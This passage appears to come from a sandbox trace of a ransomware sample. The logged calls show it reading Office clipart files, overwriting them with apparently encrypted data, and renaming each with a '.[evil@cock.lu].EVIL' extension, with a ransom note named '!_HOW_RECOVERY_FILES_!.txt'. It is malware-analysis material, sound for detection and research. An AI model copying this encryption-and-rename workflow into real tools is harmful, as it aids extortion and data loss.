dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0148.161] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7d26, lpOverlapped=0x0) returned 1 [0148.169] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0148.169] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0148.170] _errno () returned 0x84b1160840 [0148.170] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.170] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x7d40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7d40, lpOverlapped=0x0) returned 1 [0148.170] CloseHandle (hObject=0x1a8) returned 1 [0148.170] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178639.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0148.170] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0148.170] __uncaught_exception () returned 0x84b1160800 [0148.170] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0148.171] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178639.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178639.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178639.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178639.jpg.[evil@cock.lu].evil")) returned 1 [0148.172] ??_V@YAXPEAX@Z () returned 0x1 [0148.175] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178639.JPG", dwFileAttributes=0x200) returned 0 [0148.175] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0148.175] wcsstr (_Str="J0178932.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0148.175] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178932.JPG") returned 69 [0148.175] wcscmp (_String1="J0178932.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0148.175] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0178932.JPG") returned 0x0 [0148.175] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178932.JPG") returned 0x45 [0148.176] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178932.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178932.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0148.178] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x8a0c, lpOverlapped=0x0) returned 1 [0148.189] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0148.189] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0148.189] _errno () returned 0x84b1160840 [0148.189] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.189] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x8a20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x8a20, lpOverlapped=0x0) returned 1 [0148.189] CloseHandle (hObject=0x1a8) returned 1 [0148.189] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178932.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0148.189] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0148.189] __uncaught_exception () returned 0x84b1160800 [0148.189] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0148.190] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178932.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178932.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178932.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0178932.jpg.[evil@cock.lu].evil")) returned 1 [0148.190] ??_V@YAXPEAX@Z () returned 0x1 [0148.193] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0178932.JPG", dwFileAttributes=0x200) returned 0 [0148.193] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0148.193] wcsstr (_Str="J0179963.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0148.193] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0179963.JPG") returned 69 [0148.193] wcscmp (_String1="J0179963.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0148.193] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0179963.JPG") returned 0x0 [0148.193] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0179963.JPG") returned 0x45 [0148.193] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0179963.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0179963.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0148.195] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7d6e, lpOverlapped=0x0) returned 1 [0148.203] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0148.203] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0148.203] _errno () returned 0x84b1160840 [0148.203] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.203] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x7d80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7d80, lpOverlapped=0x0) returned 1 [0148.203] CloseHandle (hObject=0x1a8) returned 1 [0148.203] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0179963.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0148.204] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0148.204] __uncaught_exception () returned 0x84b1160800 [0148.204] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0148.204] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0179963.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0179963.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0179963.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0179963.jpg.[evil@cock.lu].evil")) returned 1 [0148.205] ??_V@YAXPEAX@Z () returned 0x1 [0148.208] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0179963.JPG", dwFileAttributes=0x200) returned 0 [0148.208] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0148.208] wcsstr (_Str="J0182689.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0148.209] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182689.JPG") returned 69 [0148.209] wcscmp (_String1="J0182689.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0148.209] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0182689.JPG") returned 0x0 [0148.209] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182689.JPG") returned 0x45 [0148.209] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182689.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0182689.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0148.211] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x40e7, lpOverlapped=0x0) returned 1 [0148.219] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0148.219] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0148.219] _errno () returned 0x84b1160840 [0148.219] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.219] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x4100, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4100, lpOverlapped=0x0) returned 1 [0148.219] CloseHandle (hObject=0x1a8) returned 1 [0148.219] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182689.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0148.219] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0148.219] __uncaught_exception () returned 0x84b1160800 [0148.219] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0148.220] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182689.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0182689.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182689.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0182689.jpg.[evil@cock.lu].evil")) returned 1 [0148.220] ??_V@YAXPEAX@Z () returned 0x1 [0148.223] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182689.JPG", dwFileAttributes=0x200) returned 0 [0148.224] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0148.224] wcsstr (_Str="J0182888.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0148.224] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182888.WMF") returned 69 [0148.224] wcscmp (_String1="J0182888.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0148.224] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0182888.WMF") returned 0x0 [0148.224] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182888.WMF") returned 0x45 [0148.224] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182888.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0182888.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0148.226] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5f48, lpOverlapped=0x0) returned 1 [0148.235] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0148.235] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0148.235] _errno () returned 0x84b1160840 [0148.235] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.235] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x5f60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5f60, lpOverlapped=0x0) returned 1 [0148.236] CloseHandle (hObject=0x1a8) returned 1 [0148.236] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182888.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0148.236] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0148.236] __uncaught_exception () returned 0x84b1160800 [0148.236] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0148.236] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182888.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0182888.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182888.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0182888.wmf.[evil@cock.lu].evil")) returned 1 [0148.237] ??_V@YAXPEAX@Z () returned 0x1 [0148.240] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182888.WMF", dwFileAttributes=0x200) returned 0 [0148.240] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0148.240] wcsstr (_Str="J0182898.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0148.240] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182898.WMF") returned 69 [0148.240] wcscmp (_String1="J0182898.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0148.240] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0182898.WMF") returned 0x0 [0148.240] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182898.WMF") returned 0x45 [0148.240] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182898.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0182898.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0148.242] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3b2e, lpOverlapped=0x0) returned 1 [0148.252] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0148.252] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0148.252] _errno () returned 0x84b1160840 [0148.252] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.252] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x3b40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3b40, lpOverlapped=0x0) returned 1 [0148.252] CloseHandle (hObject=0x1a8) returned 1 [0148.252] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182898.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0148.253] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0148.253] __uncaught_exception () returned 0x84b1160800 [0148.253] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0148.253] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182898.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0182898.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182898.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0182898.wmf.[evil@cock.lu].evil")) returned 1 [0148.254] ??_V@YAXPEAX@Z () returned 0x1 [0148.256] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182898.WMF", dwFileAttributes=0x200) returned 0 [0148.256] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0148.256] wcsstr (_Str="J0182902.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0148.256] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182902.WMF") returned 69 [0148.256] wcscmp (_String1="J0182902.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0148.256] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0182902.WMF") returned 0x0 [0148.256] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182902.WMF") returned 0x45 [0148.257] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182902.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0182902.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0148.258] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1e8e, lpOverlapped=0x0) returned 1 [0148.265] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0148.265] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0148.265] _errno () returned 0x84b1160840 [0148.265] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.265] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x1ea0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1ea0, lpOverlapped=0x0) returned 1 [0148.265] CloseHandle (hObject=0x1a8) returned 1 [0148.266] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182902.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0148.266] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0148.266] __uncaught_exception () returned 0x84b1160800 [0148.266] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0148.266] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182902.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0182902.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182902.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0182902.wmf.[evil@cock.lu].evil")) returned 1 [0148.267] ??_V@YAXPEAX@Z () returned 0x1 [0148.269] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182902.WMF", dwFileAttributes=0x200) returned 0 [0148.270] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0148.270] wcsstr (_Str="J0182946.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0148.270] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182946.WMF") returned 69 [0148.270] wcscmp (_String1="J0182946.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0148.270] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0182946.WMF") returned 0x0 [0148.270] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182946.WMF") returned 0x45 [0148.270] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182946.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0182946.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0148.271] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3ed2, lpOverlapped=0x0) returned 1 [0148.281] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0148.281] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0148.281] _errno () returned 0x84b1160840 [0148.281] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.281] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x3ee0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3ee0, lpOverlapped=0x0) returned 1 [0148.281] CloseHandle (hObject=0x1a8) returned 1 [0148.281] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182946.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0148.282] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0148.282] __uncaught_exception () returned 0x84b1160800 [0148.282] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0148.282] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182946.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0182946.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182946.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0182946.wmf.[evil@cock.lu].evil")) returned 1 [0148.283] ??_V@YAXPEAX@Z () returned 0x1 [0148.285] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182946.WMF", dwFileAttributes=0x200) returned 0 [0148.285] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0148.285] wcsstr (_Str="J0183172.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0148.285] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183172.WMF") returned 69 [0148.285] wcscmp (_String1="J0183172.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0148.285] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0183172.WMF") returned 0x0 [0148.286] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183172.WMF") returned 0x45 [0148.286] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183172.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0183172.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0148.287] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x745c, lpOverlapped=0x0) returned 1 [0148.297] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0148.297] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0148.297] _errno () returned 